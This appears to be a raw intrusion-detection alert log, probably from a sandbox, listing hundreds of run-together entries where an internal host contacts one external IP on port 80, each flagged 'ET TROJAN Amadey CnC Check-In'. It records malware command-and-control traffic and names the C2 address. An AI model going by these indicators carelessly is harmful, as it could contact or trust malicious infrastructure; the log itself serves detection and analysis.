                                                                    192.168.2.362.204.41.449835802027700 02/08/23-21:31:52.859571TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449737802027700 02/08/23-21:31:25.346205TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449798802027700 02/08/23-21:31:43.430750TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449896802027700 02/08/23-21:32:09.795235TCP2027700ET TROJAN Amadey CnC Check-In4989680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449948802027700 02/08/23-21:32:25.249770TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449755802027700 02/08/23-21:31:29.861684TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449820802027700 02/08/23-21:31:48.811905TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449709802027700 02/08/23-21:31:11.416191TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449807802027700 02/08/23-21:31:45.583489TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449783802027700 02/08/23-21:31:39.747318TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449868802027700 02/08/23-21:32:03.033763TCP2027700ET TROJAN Amadey CnC Check-In4986880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449881802027700 02/08/23-21:32:06.188564TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449863802027700 02/08/23-21:32:01.828272TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449712802027700 02/08/23-21:31:12.121654TCP2027700ET TROJAN Amadey CnC Check-In4971280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449810802027700 02/08/23-21:31:46.341949TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449905802027700 02/08/23-21:32:12.384320TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449961802027700 02/08/23-21:32:28.958110TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449966802027700 02/08/23-21:32:30.274782TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449765802027700 02/08/23-21:31:32.555336TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449788802027700 02/08/23-21:31:40.954036TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449727802027700 02/08/23-21:31:22.887483TCP2027700ET TROJAN Amadey CnC Check-In4972780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449923802027700 02/08/23-21:32:19.023556TCP2027700ET TROJAN Amadey CnC Check-In4992380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449958802027700 02/08/23-21:32:28.145173TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449704802027700 02/08/23-21:31:10.105007TCP2027700ET TROJAN Amadey CnC Check-In4970480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449830802027700 02/08/23-21:31:51.265355TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449900802027700 02/08/23-21:32:10.776959TCP2027700ET TROJAN Amadey CnC Check-In4990080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449745802027700 02/08/23-21:31:27.438465TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449871802027700 02/08/23-21:32:03.779795TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449817802027700 02/08/23-21:31:48.055582TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449722802027700 02/08/23-21:31:17.801755TCP2027700ET TROJAN Amadey CnC Check-In4972280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449793802027700 02/08/23-21:31:42.202189TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449853802027700 02/08/23-21:31:59.419398TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449775802027700 02/08/23-21:31:37.801160TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449800802027700 02/08/23-21:31:43.904291TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449858802027700 02/08/23-21:32:00.606919TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449778802027700 02/08/23-21:31:38.510712TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449809802027700 02/08/23-21:31:46.106372TCP2027700ET TROJAN Amadey CnC Check-In4980980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449907802027700 02/08/23-21:32:13.917744TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449876802027700 02/08/23-21:32:04.982215TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449910802027700 02/08/23-21:32:15.871067TCP2027700ET TROJAN Amadey CnC Check-In4991080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449760802027700 02/08/23-21:31:31.042505TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449815802027700 02/08/23-21:31:47.530708TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449913802027700 02/08/23-21:32:16.595552TCP2027700ET TROJAN Amadey CnC Check-In4991380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449735802027700 02/08/23-21:31:24.825436TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449928802027700 02/08/23-21:32:20.315211TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449729802027700 02/08/23-21:31:23.382592TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449840802027700 02/08/23-21:31:56.252732TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449943802027700 02/08/23-21:32:24.007317TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449845802027700 02/08/23-21:31:57.496565TCP2027700ET TROJAN Amadey CnC Check-In4984580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449730802027700 02/08/23-21:31:23.623024TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449886802027700 02/08/23-21:32:07.408944TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449851802027700 02/08/23-21:31:58.949710TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449724802027700 02/08/23-21:31:22.157497TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449848802027700 02/08/23-21:31:58.209736TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449802802027700 02/08/23-21:31:44.378402TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449707802027700 02/08/23-21:31:10.935837TCP2027700ET TROJAN Amadey CnC Check-In4970780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449837802027700 02/08/23-21:31:54.069031TCP2027700ET TROJAN Amadey CnC Check-In4983780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449773802027700 02/08/23-21:31:37.289230TCP2027700ET TROJAN Amadey CnC Check-In4977380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449843802027700 02/08/23-21:31:57.016438TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449732802027700 02/08/23-21:31:24.105231TCP2027700ET TROJAN Amadey CnC Check-In4973280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449878802027700 02/08/23-21:32:05.452117TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449951802027700 02/08/23-21:32:26.219930TCP2027700ET TROJAN Amadey CnC Check-In4995180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449921802027700 02/08/23-21:32:18.515786TCP2027700ET TROJAN Amadey CnC Check-In4992180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449873802027700 02/08/23-21:32:04.268049TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449915802027700 02/08/23-21:32:17.076591TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449956802027700 02/08/23-21:32:27.633042TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449795802027700 02/08/23-21:31:42.683944TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449893802027700 02/08/23-21:32:09.064082TCP2027700ET TROJAN Amadey CnC Check-In4989380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449884802027700 02/08/23-21:32:06.923410TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449954802027700 02/08/23-21:32:27.113819TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449706802027700 02/08/23-21:31:10.701281TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449865802027700 02/08/23-21:32:02.300345TCP2027700ET TROJAN Amadey CnC Check-In4986580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449715802027700 02/08/23-21:31:13.538251TCP2027700ET TROJAN Amadey CnC Check-In4971580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449762802027700 02/08/23-21:31:31.524264TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449804802027700 02/08/23-21:31:44.855991TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449969802027700 02/08/23-21:32:31.022857TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449883802027700 02/08/23-21:32:06.680163TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449753802027700 02/08/23-21:31:29.389092TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449842802027700 02/08/23-21:31:56.777809TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449776802027700 02/08/23-21:31:38.042042TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449805802027700 02/08/23-21:31:45.092452TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449935802027700 02/08/23-21:32:22.032745TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449846802027700 02/08/23-21:31:57.735834TCP2027700ET TROJAN Amadey CnC Check-In4984680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449757802027700 02/08/23-21:31:30.341809TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449912802027700 02/08/23-21:32:16.359167TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449716802027700 02/08/23-21:31:14.532463TCP2027700ET TROJAN Amadey CnC Check-In4971680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449781802027700 02/08/23-21:31:39.216997TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449953802027700 02/08/23-21:32:26.867865TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449823802027700 02/08/23-21:31:49.543782TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449734802027700 02/08/23-21:31:24.588963TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449899802027700 02/08/23-21:32:10.520938TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449861802027700 02/08/23-21:32:01.357771TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449772802027700 02/08/23-21:31:37.016273TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449916802027700 02/08/23-21:32:17.326423TCP2027700ET TROJAN Amadey CnC Check-In4991680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449950802027700 02/08/23-21:32:25.900036TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449763802027700 02/08/23-21:31:31.780351TCP2027700ET TROJAN Amadey CnC Check-In4976380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449852802027700 02/08/23-21:31:59.185304TCP2027700ET TROJAN Amadey CnC Check-In4985280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449941802027700 02/08/23-21:32:23.532205TCP2027700ET TROJAN Amadey CnC Check-In4994180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449925802027700 02/08/23-21:32:19.523158TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449922802027700 02/08/23-21:32:18.772895TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449738802027700 02/08/23-21:31:25.612828TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449836802027700 02/08/23-21:31:53.163923TCP2027700ET TROJAN Amadey CnC Check-In4983680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449827802027700 02/08/23-21:31:50.529167TCP2027700ET TROJAN Amadey CnC Check-In4982780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449833802027700 02/08/23-21:31:51.983787TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449931802027700 02/08/23-21:32:21.032345TCP2027700ET TROJAN Amadey CnC Check-In4993180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449744802027700 02/08/23-21:31:27.200875TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449747802027700 02/08/23-21:31:27.935502TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449919802027700 02/08/23-21:32:18.035543TCP2027700ET TROJAN Amadey CnC Check-In4991980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449794802027700 02/08/23-21:31:42.450951TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449880802027700 02/08/23-21:32:05.941168TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449750802027700 02/08/23-21:31:28.669505TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449791802027700 02/08/23-21:31:41.723772TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449785802027700 02/08/23-21:31:40.215518TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449874802027700 02/08/23-21:32:04.500033TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449963802027700 02/08/23-21:32:29.504401TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449814802027700 02/08/23-21:31:47.295499TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449849802027700 02/08/23-21:31:58.454915TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449725802027700 02/08/23-21:31:22.403677TCP2027700ET TROJAN Amadey CnC Check-In4972580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449938802027700 02/08/23-21:32:22.819598TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449903802027700 02/08/23-21:32:11.766469TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449855802027700 02/08/23-21:31:59.888895TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449944802027700 02/08/23-21:32:24.249933TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449808802027700 02/08/23-21:31:45.869321TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449766802027700 02/08/23-21:31:32.973144TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449719802027700 02/08/23-21:31:17.030553TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449939802027700 02/08/23-21:32:23.062857TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449731802027700 02/08/23-21:31:23.865413TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449746802027700 02/08/23-21:31:27.686672TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449844802027700 02/08/23-21:31:57.262976TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449942802027700 02/08/23-21:32:23.769179TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449792802027700 02/08/23-21:31:41.968819TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449890802027700 02/08/23-21:32:08.343447TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449703802027700 02/08/23-21:31:09.854969TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449774802027700 02/08/23-21:31:37.538022TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449872802027700 02/08/23-21:32:04.015502TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449801802027700 02/08/23-21:31:44.140311TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449859802027700 02/08/23-21:32:00.842850TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449957802027700 02/08/23-21:32:27.889281TCP2027700ET TROJAN Amadey CnC Check-In4995780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449779802027700 02/08/23-21:31:38.749643TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449877802027700 02/08/23-21:32:05.223019TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449952802027700 02/08/23-21:32:26.521263TCP2027700ET TROJAN Amadey CnC Check-In4995280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449756802027700 02/08/23-21:31:30.104619TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449816802027700 02/08/23-21:31:47.785160TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449929802027700 02/08/23-21:32:20.553590TCP2027700ET TROJAN Amadey CnC Check-In4992980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449834802027700 02/08/23-21:31:52.577365TCP2027700ET TROJAN Amadey CnC Check-In4983480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449741802027700 02/08/23-21:31:26.473669TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449869802027700 02/08/23-21:32:03.296837TCP2027700ET TROJAN Amadey CnC Check-In4986980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449960802027700 02/08/23-21:32:28.668791TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449782802027700 02/08/23-21:31:39.471649TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449764802027700 02/08/23-21:31:32.057321TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449811802027700 02/08/23-21:31:46.576529TCP2027700ET TROJAN Amadey CnC Check-In4981180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449887802027700 02/08/23-21:32:07.638708TCP2027700ET TROJAN Amadey CnC Check-In4988780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449924802027700 02/08/23-21:32:19.271281TCP2027700ET TROJAN Amadey CnC Check-In4992480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449769802027700 02/08/23-21:31:34.756431TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449906802027700 02/08/23-21:32:12.698779TCP2027700ET TROJAN Amadey CnC Check-In4990680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449728802027700 02/08/23-21:31:23.125330TCP2027700ET TROJAN Amadey CnC Check-In4972880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449882802027700 02/08/23-21:32:06.440098TCP2027700ET TROJAN Amadey CnC Check-In4988280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449947802027700 02/08/23-21:32:25.015743TCP2027700ET TROJAN Amadey CnC Check-In4994780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449965802027700 02/08/23-21:32:30.025255TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449904802027700 02/08/23-21:32:12.046729TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449711802027700 02/08/23-21:31:11.882854TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449867802027700 02/08/23-21:32:02.794106TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449864802027700 02/08/23-21:32:02.060206TCP2027700ET TROJAN Amadey CnC Check-In4986480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449962802027700 02/08/23-21:32:29.257081TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449705802027700 02/08/23-21:31:10.447077TCP2027700ET TROJAN Amadey CnC Check-In4970580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449818802027700 02/08/23-21:31:48.341113TCP2027700ET TROJAN Amadey CnC Check-In4981880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449959802027700 02/08/23-21:32:28.422447TCP2027700ET TROJAN Amadey CnC Check-In4995980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449870802027700 02/08/23-21:32:03.546238TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449726802027700 02/08/23-21:31:22.634931TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449821802027700 02/08/23-21:31:49.045771TCP2027700ET TROJAN Amadey CnC Check-In4982180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449824802027700 02/08/23-21:31:49.780553TCP2027700ET TROJAN Amadey CnC Check-In4982480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449754802027700 02/08/23-21:31:29.621347TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449751802027700 02/08/23-21:31:28.918585TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449895802027700 02/08/23-21:32:09.563402TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449934802027700 02/08/23-21:32:21.786854TCP2027700ET TROJAN Amadey CnC Check-In4993480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449937802027700 02/08/23-21:32:22.552019TCP2027700ET TROJAN Amadey CnC Check-In4993780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449892802027700 02/08/23-21:32:08.821841TCP2027700ET TROJAN Amadey CnC Check-In4989280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449839802027700 02/08/23-21:31:55.963337TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449797802027700 02/08/23-21:31:43.170405TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449854802027700 02/08/23-21:31:59.659125TCP2027700ET TROJAN Amadey CnC Check-In4985480192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449721802027700 02/08/23-21:31:17.546135TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449940802027700 02/08/23-21:32:23.296032TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449889802027700 02/08/23-21:32:08.107631TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449718802027700 02/08/23-21:31:15.921504TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449759802027700 02/08/23-21:31:30.808118TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449932802027700 02/08/23-21:32:21.312523TCP2027700ET TROJAN Amadey CnC Check-In4993280192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449926802027700 02/08/23-21:32:19.767739TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449713802027700 02/08/23-21:31:12.783643TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449897802027700 02/08/23-21:32:10.032773TCP2027700ET TROJAN Amadey CnC Check-In4989780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449967802027700 02/08/23-21:32:30.528686TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449790802027700 02/08/23-21:31:41.465182TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.362.204.41.4
                                                                    192.168.2.362.204.41.449862802027700 02/08/23-21:32:01.593618TCP2027700ET TROJAN Amadey CnC Check-In4986280192.168.2.362.204.41.4
